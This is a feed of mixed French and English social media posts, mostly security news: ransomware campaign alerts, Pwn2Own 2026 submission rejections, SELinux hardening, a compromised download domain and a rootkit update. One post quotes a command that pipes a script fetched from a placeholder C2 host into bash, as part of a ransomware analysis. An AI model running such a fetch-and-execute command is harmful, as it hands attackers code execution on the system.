@cortisquared Je connais pas ce club, Mais Zucman propose un paiement en action possible car bien conscient qu'une entreprise ne génère pas forcément de bénéfice malgré sa valorisation, qui s'élèverait donc à 2% de la part d'actions possédées. Quant aux retraités....
I worked with @RussianPanda9xx and @TheDFIRReport to investigate and publish this flash alert. The trojanized payloads (disguised as legitimate tools like Greenshot, SyncTrayzor, DocFX, and Cake) established primary C2 channels through ClickHouse and Supabase, with secondary backup channels capable of dynamically falling back to Ably, Dropbox, direct HTTP, or even GitHub Issues.
This campaign ultimately delivered The Gentleman Ransomware, with aggressive data exfiltration via Rclone and lateral movement using GoTo Resolve RMM.
Read the flash report below ⬇️
#dfir #tuktukc2 #etherRAT
‼️🚨 Pwn2Own Berlin 2026 just hit a wall. For the first time in 19-years, ZDI rejected dozens of working zero-day RCE submissions because organizers ran out of contest slots.
Rejected hackers are now going public with PoC demos and direct vendor disclosures, breaking Pwn2Own's usual secrecy.
▪️ AI surfaces a massive wave of 0-day RCEs.
▪️ Submissions overwhelm ZDI past max capacity.
▪️ Slots run out. Researchers with working chains get rejected.
▪️ "Revenge disclosures" begin. ← we are here.
Confirmed casualties so far:
▪️ @xchglabs : 86 vulnerabilities prepared (PyTorch, NVIDIA, Linux KVM, Oracle, Docker, Ollama, Chroma, LiteLLM, llama.cpp). All rejected. Now reporting directly to vendors with writeups dropping as patches land.
▪️ @ggwhyp : full-chain Firefox RCE on Windows. Rejected. Publicly demoed (HTML page → cmd.exe → calc.exe). Responsibly disclosed to Mozilla.
▪️ @yunsu_dev : working RCE chain, rejected. Submitting elsewhere.
▪️ @ryotkak : tried to register for 3+ weeks. ZDI confirmed "at maximum capacity, can't add extra contest days." Considered canceling flight and hotel.
▪️ @anzuukino2802 : Claude Code RCE PoC. Rejected.
▪️ @desckimh : 0-day RCEs in Ollama and LM Studio. Rejected.
Reported impact: a community-estimated 150+ researchers tried to register. Accepted contestants are now being warned about collisions. Rejected vulnerabilities going to bug bounty programs may trigger pre-event patches that invalidate the work of those who got in.
ZDI has not publicly addressed the capacity issue. The event still runs May 14-16 in Berlin.
GrapheneOS is immune to the Copy Fail vulnerability due to the deep integration of SELinux in the Android Open Source Project (AOSP). AOSP only permits using specific types of sockets throughout the OS. It only permits the dumpstate process used to create bug report zips to access AF_ALG sockets.
SELinux is based on explicitly listing out everything that's permitted and anything not listed isn't allowed. AOSP uses strict, fine-grained SELinux policies for the whole OS. Instead of simply permitting everything that's used in a fine-grained way, the rest of the OS is developed with it in mind.
One command. No file written to disk. Full code execution inside a container.
curl -fsSL [C2]:666/files/proxy. sh | bash
This is how TeamPCP's container ransomware operation starts.
Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.
@david7879@CRSegerie Je suis d'accord, histoire alambiquée comme pas possible, L'IA s'est réveillée et a elle même câblé, et configuré tout son réseau elle même :D
Mr. Titus Tech is correct. cpuid-dot-com is indeed delivering malware right now.
As I began poking this with I stick I discovered this is not your typical run-of-the-mill malware. This malware is deeply trojanized, distributes from a compromised domain (cpuid-dot-com), performs file masquerading, is multi-staged, operates (almost) entirely in-memory, and uses some interesting methods to evade EDRs and/or AVs such as proxying NTDLL functionality from a .NET assembly.
The C2 domain present in one of the binaries is a clear IoC. This is the same Threat Group who was masquerading FileZilla in early March, 2026. They've been busy.
New post of Stealthy Singularity Rootkit
Singularity in a brief commit will intercepts the scheduler and OOM reporting paths used by Magic SysRq, closing the gaps that leave rootkits like Kovid and diamorphine exposes.
https://t.co/vR3GmwkOcd
#Linux#rootkits#infosec
@BlablaLinux Ah j'avais des use cases plus spécifiques en tête. Ex : deux noeuds du cluster qui peut faire du GPU pas les autres tout ça ! mais t'as pas l'air d'avoir céder a l’extrémisme ;)
@_Mark_Atwood@birch_js@FFmpeg@amazon You're right, i'm just mad that aws repacked a open-source solution behind a product that they seemingly "created" rather than contributing to the original. from Apache 2.0 point of view it's legal but harmful for the ecosystem. It's now fix by esv2 licence
@ClaudeMery1@pimarty86 C'est simplement due aux capteurs à balayage qui font effectivement des prises de vue R,G,B dans un ordre ce qui donne cet effet lors d'un objet en mouvement ;)
@pimarty86@JulienDelRio D'ailleurs le phénomène de décalage des couleurs du blancs est artéfacts due aux photos satellites, tu devrais pouvoir la source de la prise de vue sat ou basse altitude sur google non ?
@bortzmeyer@l00000001l Vu comme ça clairement ! En revanche ça reste discret pour de la persistance dans le cas d'un accès distant un peu pété, je pensais surtout au notepad admin, si la dll accessible en user se lance via le restart admin attention si non ça reste une dll hijack comme les autres...